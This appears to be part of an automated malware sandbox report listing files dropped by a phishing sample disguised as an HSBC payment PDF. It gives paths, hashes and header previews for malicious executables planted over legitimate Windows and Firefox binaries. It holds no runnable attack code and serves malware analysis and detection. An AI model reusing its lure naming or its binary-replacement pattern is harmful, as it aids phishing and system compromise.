                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#.....,..... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1340928
                                                                                                                                                                              Entropy (8bit):4.611608218070923
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:rIhjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:KX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:FE8EE071E09DE5224FDA5EF3BD5DDE7B
                                                                                                                                                                              SHA1:CE660E4CCBF85072083684B11FC6304C53D9A128
                                                                                                                                                                              SHA-256:3857F64E1F23E2B07AE9E228C759DA8BC7ECCD314D477A2BBCEE629459AE6E1C
                                                                                                                                                                              SHA-512:21C5FA4C41EC8362ED97862C972AE7C8D320E8CAC7FB67B6C9A63499858AE27BF4E3E928C7D473C807D64242BFE9223AEF94FE75D9E700B7FB38AD55EFB6D259
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................^..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1687552
                                                                                                                                                                              Entropy (8bit):5.0153845307020575
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:w8oRswt2ioQ3J+Ry/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:w8oRxoFyLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:CA98D11B1ABD2F34A56ED16D1D9AF046
                                                                                                                                                                              SHA1:5B670257D001170FD4AF14F0C36E1E33D250DE01
                                                                                                                                                                              SHA-256:31E725904850485E6DFCDC88F25E3BED1A8A84A4768D4F4CD6B2219CD963ABAF
                                                                                                                                                                              SHA-512:79778B9F78B16F149EAAB230B01D72F816957C0240FFFF59E70D9DD12A84A930F9E5C8A776C8C40E93784A7269EBE536C42096F3B11FD44EE169D0E0D9EAF570
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%........... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1497600
                                                                                                                                                                              Entropy (8bit):4.791078378932267
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:hf8HQlTMxHwJ07wR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hkHQlawJ0SLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3206E24DCAD73836B9178A36081FFB69
                                                                                                                                                                              SHA1:320E6231177189C712F501D981B177277DE0F87E
                                                                                                                                                                              SHA-256:6044914105C99FCEE2FF053C8590198B94D5794FEC9C74552C7D27A235ED0990
                                                                                                                                                                              SHA-512:66630DB53E84E7A0FFEAFCABE5D6BBD289832C53102484F31B25BDE7DC36F7A2D8C0FA3BF9CE830C2DB8422FE7746F286A430FACFF44E3BBF8D47833AB9EA595
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@..............................!.......... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...`...........:..............@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1534464
                                                                                                                                                                              Entropy (8bit):7.1171717558806495
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:mSEmYD6gjGPG45QVDkfX4lyTyB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:m5mYD6g2GWQVQfeyTmLNiXicJFFRGNzb
                                                                                                                                                                              MD5:255C15D8B8FBDFB400C23AFF35A08C46
                                                                                                                                                                              SHA1:E5CAA82ECA9EA9AFD09698FC450D54BF33158D5F
                                                                                                                                                                              SHA-256:A3B9757B12365F766D6DC75C51032361D60A464AC8F868E6D507336254314050
                                                                                                                                                                              SHA-512:8AF2499913A8DCA8F9BBD3593FC32FA3B17EEB4AF9F10428C5FCF2D76774FB933D8C1AA6DA1208938B5B4F722D76C9EB62453692EF2CCD5B57DCC1A4C7266972
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Hegeleos

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):93696
                                                                                                                                                                              Entropy (8bit):6.839650012638765
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:vhdlOFKMD4R2BfFo8PAsCkloIirECXlhfavrUhKyt+EFGu4TmC8WtLNjN2Q5BS55:ZdUFBa2VNPAsCkloIirECXlpazzytlFt
                                                                                                                                                                              MD5:1C761A6889D1FEF7FB0ECE8A758C2E24
                                                                                                                                                                              SHA1:1F54C6F04E43FEEEBA01C891D122C8D14F754F0E
                                                                                                                                                                              SHA-256:2FA75C8DA11FD0852903A69F6E96B62A19C4C40BE558BDF93A06CA0DA4D5ED7F
                                                                                                                                                                              SHA-512:60DC90F1D335D818D1409E224E3EECD56EBA46430559C8188D1F20C2CCD4D735BFF70EF7CF06B6B0D9E1F53F00FF96F10857C4F072C947CEA532F5A2CCFCDBA7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.c.NF4NCTUOP..W9.8XICJP9uNE4NCPUOPLIW9X8XICJP95NE4NCPUOPLIW9.8XIMU.75.L.o.Q..q.!>JxH*&$81T.-$Z ,$u-5l;"WxQ6i....X!!Q`N]_kPLIW9X8..CJ.86N..;.PUOPLIW9.8ZHHK.95*D4NKPUOPLIY.Y8XiCJP.4NE4.CPuOPLKW9\8XICJP91NE4NCPUO.MIW;X8XICJR9u.E4^CPEOPLIG9X(XICJP9%NE4NCPUOPLI..Y8.ICJP.4N.1NCPUOPLIW9X8XICJP95.D4BCPUOPLIW9X8XICJP95NE4NCPUOPLIW9X8XICJP95NE4NCPUOPLIW.X8PICJP95NE4NCXuOP.IW9X8XICJP9.: L:CPU[2MIW.X8X-BJP;5NE4NCPUOPLIW9x8X)m8#KVNE4.FPUO.MIW?X8X/BJP95NE4NCPUOP.IWyvJ=%,)P99NE4N.QUORLIWUY8XICJP95NE4NC.UO.LIW9X8XICJP95NE4..QUOPLI.9X8ZIFJH.5N.NCSUOP.IW?8.XI.JP95NE4NCPUOPLIW9X8XICJP95NE4NCPUOPLIW9X8XI.7.6...]=.UOPLIW8Z;\OKBP95NE4NC.UOP.IW9.8XItJP9.NE4#CPUkPLI)9X8&ICJ495N74NC1UOP.IW978XI-JP9KNE4PAxJOPFcq9Z.xIC@P..=d4NI.TOPH:u9X2.KCJTJ.NE>.@PUK#hIW3.<XIG9u95D.1NCT..PO.A?X8C&{JP35M.!HCPNevLK..X8RIilP:.[C4NXzwOR.@W9\..:^JP?..E4D7YUOR.CW9\.FKk.P9?dgJ]CPQdPfk)-X8\bC`rG NE0eCzw1FLIS.X.z7TJP=.No2d!P'.\L9TV98XOk.P9?f.4NEP.uP2GW9\:7.CJZ...E..CPSOx.IW?X..ICLP.aNE2Nk.UOVLcm9phXIEJxh5NC4d.P+|PLM{>&.XIGaFG.NE0.E(U

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\autC5C5.tmp

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):66002
                                                                                                                                                                              Entropy (8bit):7.90342236913907
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:IJb6y284yhgw/ADEeO3y78Cao7uzASH6MgoUuM5KA:S6ySw/oguviU4V7UvKA
                                                                                                                                                                              MD5:F418B8319DF2AB33B43527D34B55BAF5
                                                                                                                                                                              SHA1:D2CF1272C89E2CCCA3084036C90E7173A07B6D4D
                                                                                                                                                                              SHA-256:C7CFBBF8F4ED0BE863D33CD9CE9979E72295F6E117CF5BAA6DEF6AD1D8033C34
                                                                                                                                                                              SHA-512:FDFB1D75CECA401710BE833186EB7AE130089C2FE9091BF3B7172B34CF77900FE33DCE4BA507C16E02442A14AB1A6D73F8859763D077659E7CDE2B6FBCD8D63A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:EA06..n......4.C.Ui....9.N+...*.9.....@.X.Rj....f....`.X..}Sy......1...1!.R...T.I8.."..%jA,.]e.[d.EW.Tf.<....Hd5..:._..,f.......;......5..V...\.s5.Q&..X..+;...i..33@.B.C.]@..]^s\.....k[.m&.;...Jsu..f...B.....5.@.f$.....+3..$.c.9.....M(@!.......N*....X.@....R.d........b[B.T'`....qX..g.:]X.X.Q.....a?.,%. ...I..n..Y).Ng ....U.....d.k..Ui. ...}..7Q..b.I.R..y.;..P.`..X...}k.......-p&.......}...lN+S..>.B.,..X..........D....... .@..0..4.,&..........p..Z.XR......J..(.;....Rht..O.=.M)..R.P.N.....K.....:.>.P*.Z\..I........u..h.P.B....).z..QC.^.U......(u.u..L......J.i.T'\...iN.^....2...D...*.?..(.J$...s(`....k..'3.%..]..*6J...)..'.....r..).Y...z..h..MN%X.^..JUB{..[.VI.BO.S'5J..qX.....E....T/.Z....N....*....(..%..S..#@?LB.I..*...:.2.Z.Z}Z.c..n...&.J.Z&......J..e6.>.B.<.......6.Y@.a?...5(.b..<Ds@#.:....4.MFsp..!W@.&...Ui5.$..9.N....*.9..(.JE....v)7.=bup..M...6q..J*..m..W...\....Y. ...g..)5...MZ..X...mA.P..[.............!b.......~.9..(.y.\..L.@....I..R.Db.4.Z

                                                                                                                                                                              C:\Users\user\AppData\Roaming\aed9f0dd1e9bf5c4.bin

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                              Entropy (8bit):7.984711361270375
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:yOgIimdNU4bytvYBRob6VVsCimaCoG2AufUwmd9:yOfU4SABhVhhaCoG2Ahhd9
                                                                                                                                                                              MD5:4B33699EC5A72B35AF5171EAF0A7C245
                                                                                                                                                                              SHA1:A0433EF2DE201AC98719460185849D8E2A481037
                                                                                                                                                                              SHA-256:F50BA2CB155981030224D94CEDF0C4F35C74FAA59538C67298CE41025D5EDD5D
                                                                                                                                                                              SHA-512:7C7A179B40A097321EE27BBDD91AEEA42885F6767F7B094230014E57AA87FE6AF605FF392C16F5F8851CF81386A061B8AF4F61F8C096046D4F777B7B6542EE65
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.....s?G.].....9FC....n$cp .r.....gQ(........$IH.... %a.- .....a......6W..3....t.D.\}_5)..<...,.#.j/..;...I..w1..._$.T~i..=..w.U...J.S....$0Xm..LD(.l..N....&.s...O...p%.gJ.R4..q.H#N.'..R..3...J.;.iIy..I...:..N....J..H..t3N..N.._... h9..0..d......?......;~x..F...z..6/.+<....'.7._....b..:{.D...9...5.NYp.k..lv.....KR.a.b.1.....E....H..<&...Xg[....6Q..Y9.t....S..w.T.C.s.>JAdt.@l..B.L@t.....$.]sd.y..F.}..`m..]J([4B....psz)..B..c......1O..{7_...Ay...o..V.9../UY..'.:=..M....Q..h]<2.Vn.{......H.0w.._~../.hP..Z.........6c7(...Q.\0k0..SO..#.V;Me.8.+>..<x.D*0.h=...~eh..7]....%...4......$)=.n.L.}....bj....:.Hd.m.....K. @...P....,9........@.I~m.C.-....T..lS.......Z(x.U..t....k...r.....t....D.n..4..l+U...2....._0Pa.............{.).H..;_..:....;7vx.._...?.[..s..V..59OW..#*.w.....'.w<w.]..w.K.|..jY..L...gi.0@7....{M....X34........GC.._......A0.<..).\.|.+.}..v..|.[...{7........Y}N6C1p....=.,...JB\.|......7.l...x.(....>..........u+.*..DB.'CQQ.$..B..VE..>.+..v..

                                                                                                                                                                              C:\Windows\DtcInstall.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):2313
                                                                                                                                                                              Entropy (8bit):5.133468948582604
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786W:Z070s0Y0q0mF7Dm51
                                                                                                                                                                              MD5:AC1D4010B78250EFA82F461C1EF0B5CA
                                                                                                                                                                              SHA1:0AFEBFC203760E9AEADE87170E61B75724C48BD3
                                                                                                                                                                              SHA-256:987E68A6BFBF1F96C2254ADC3F2385FB1DD9F533633278C1811A1D45B6CD35E3
                                                                                                                                                                              SHA-512:4C259B3FCFAACBD56DC8EF603BCC4CE685F800DD8DC543560F14C09A6282C91AED2F5FA8379F6A2154C168E301B342812399A5BE8223A839D706E8B3D0A64C01
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                              C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\322h\266\203"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                              Entropy (8bit):0.9478489356175586
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:+zb/d4ZTyVPuvPLAr6oxeJ2q6o/46AP3ePfIPHSPvJmspsSuPobaG7/b/Q3:E/d4lrA/IJ2q6o46gaJyPd3
                                                                                                                                                                              MD5:3D2A912DE78A048219682B0B55E4E4AE
                                                                                                                                                                              SHA1:554B6E0215905CBCAF8B828E0E6F1F9EDAA5320A
                                                                                                                                                                              SHA-256:2BA1BF23ADD439DE48B411B3EE99C40A5A97B3E8E8EDF9674E851B06DA9F06B7
                                                                                                                                                                              SHA-512:07C293C904FB3C3A357EC21EB01631F17E8D97F882FED920FC3A42F5F35EB33E19DD936EDCE2F6146E3DE70A6CFC3F64BE197F1BCFB5958754E9E965004B0BF0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.(..@...@...........................................!....................................h...............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............a.:Y.K..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P..........h..................................................................8.B..h......19041.1.amd64fre.vb_release.191206-1406.....,.@..h.................'"a.-....spp.pdb...........@..h.......T.c..i.\.C.s"8@....vssvc.pdb......./.@..h......W.p.D.......]....vssapi.pdb......-.@..h.......\..Q....T*&.......udfs.pdb........0.@..h........B..,`..9..4.....ifsutil.pdb.....-.@..h......I:...S%9.`...'.R....uudf.pdb........1.@..h.............1$OI"......wbengine.pdb................................

                                                                                                                                                                              C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\aed9f0dd1e9bf5c4.bin

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                              Entropy (8bit):7.98516147391507
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:139GJoABN+O3dXPqD+Z3F2jqyA91lQePSNW1As7HT2:139erN+O3dSDk1l9QeKM1As6
                                                                                                                                                                              MD5:7DD7B5782CC8EADCBB8E34EB3AACFEC0
                                                                                                                                                                              SHA1:367BB80E851D78A34BF8A9FB477B7536E4C1A4F0
                                                                                                                                                                              SHA-256:2782D170E68993E0331E3E259CCFC49C30CC60E6F9D2DF3F0985DFB2A53D5EA8
                                                                                                                                                                              SHA-512:DFBE8643A6D813EC22526952A5F6E7EB37802251F986ADF41CC78FD95A1278DD7C3764FCE05345D888C253085AE747AB140509B552CB2CB25DA460E4D32C0CCF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.&B..Z.W.....9..H.1..9*II.L#:.......9.....F@..eg.9...7...8....NH.Y.."9.q..Q.%.s...{)M..6S....%.=..k.ihc..L8d...$....*.2...w....Q...M.-......>. ...T..u.X.f.....\.....D..R.....lUck.8RD..L.dF..$..|^..~}.?Y..;..GV.j...r|2,...+.v%.,_R.%."lc.._._.7~.A"..K.G1.+.........4..r.H...sD.Z..<.f....4Wkn{...(R3Z9R.s.~..Q..rk...5.-u.V......)^......1;..K.X$...V/\^..tM..........a=..%...@.....gX.y..V9.lCb ...h).R.V%.6.T.i0..O.>......|w..<<...V..I.6N.:.e......@.bK]`.sznS.G.\$....5...Vx.`...^2.n.b.]^.q9....`.F6(....D.m....w0...Ps..G\P<.F.V...{......Y..`..y["....V}I^+[...%V.l.9}......~....@.lu]w._..Y..j........D.u.d..p.D......AM.....7.o.29S..C..kvc.K..Y....r....l...p.....d.@..$.k....>D.F../..>..I.M...nQe..MN.....HeR.....j.fW0..,.Z.....x''./..f..f\>.O.b1._.....(..S.Z...k4.1i.3....X.K..;.8.w5..b=.zHr..M/6.%Vk=...>..+f........B.&.......,ZL".urK..#E.A_...TQ.....U...M..s...<]._.\K...m...J,...z....{.r..rF...f.t.Y...u..''0...(.X.CR\x..M.Vn".....N.(yg...A....D.u....

                                                                                                                                                                              C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1306624
                                                                                                                                                                              Entropy (8bit):4.538205713913881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:VfiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Vr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:A01D0D18438CEA05470B157B11E94B3F
                                                                                                                                                                              SHA1:94707EAE8DC2E133D29E04F704F4FC68295A940B
                                                                                                                                                                              SHA-256:4E12D36ADEAEE5B8AAC138B2CE38CE3466D81160F25C35C83DD90F5948D0B929
                                                                                                                                                                              SHA-512:9EEF64F7D2B28B50CFC6F74C0274F660DC0F309F478522EC0AE9D97E065727D9E7B4C6320CB3B6E4B8EA35511E402E92E8B4D32EF973B37405E43EA5BB2FC54E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@..................................a........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...`...........P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\AgentService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                              Entropy (8bit):6.967182536486352
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:iwVFr68Vw9wn/6h8p1zidVLNiXicJFFRGNzj3:iwVFrssCndV7wRGpj3
                                                                                                                                                                              MD5:8311FBEB6995BA81570173720F2B188B
                                                                                                                                                                              SHA1:A3EA926C558B12D0183D383132913441006E2C8C
                                                                                                                                                                              SHA-256:C67F893C73881CBFE5881EF7B7049C73414FCB7380846C2F9D548336E4094C2F
                                                                                                                                                                              SHA-512:02050F1F705F5357C3800B9106A0DA2967BCCD3A37CDF6358B83411F5CDF1A199963DBE5C7A7F859E4BA29909594538C70FFC00B0D4235222C9D5D03E83B442D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\AppVClient.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1348608
                                                                                                                                                                              Entropy (8bit):7.2434010074497355
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:OQW4qoNUgslKNX0Ip0MgHCp+MBOuz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OQW9BKNX0IPgi8MBOuzLNiXicJFFRGNf
                                                                                                                                                                              MD5:FEBB8A1C8444E585D00E9798A241F535
                                                                                                                                                                              SHA1:D6167EEEE0A3914A0FA67F6C64470607AABABF2E
                                                                                                                                                                              SHA-256:B432B4ADD726A4522C592580B1EB55DFF7F71D86187AA8834B2D8488702A18C4
                                                                                                                                                                              SHA-512:851B5F1A848194ECB41BA43D73B9C0E99A8E5E689B4719806980133AE0E7FACDAB80166BF7A6854A5DB1E0893A6B8EB291016A2D0EEE365206C719460DDE3501
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1379840
                                                                                                                                                                              Entropy (8bit):4.681742274303295
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:12G7AbHjk0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:12G7AbHjlLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:715FCD651D1C387B372D171CB6780B86
                                                                                                                                                                              SHA1:21C0910CF71F71F0E642958647E4797F7E1EB799
                                                                                                                                                                              SHA-256:E614B6E719265DEA7B0C365DC712173D8C84B37204AC9F87D45E30512F5DE754
                                                                                                                                                                              SHA-512:EAAF015B10D3D005F1ED37B17E557E1659181E90CDE91A23F0E7524EAC796F563F107DBBD927A9EE395B2E5BECB8AFB2B9E8821210489AE22FB2E87FF6BD2857
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................. .......... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...`...........n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1242624
                                                                                                                                                                              Entropy (8bit):7.28022955368704
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:QkdpSI+K3S/GWei+qNv2wG3s/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Q6SIGGWei2wG3sLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:B19D2C88C8C42BA1F4C83060C439AAFE
                                                                                                                                                                              SHA1:87666F99BB9ECDC6DCECA8B0298F1B11F1EC234C
                                                                                                                                                                              SHA-256:EBB4821230948E97D93F305A03BD78E1BC2EB540F1F2B509040F4BA73B1CC547
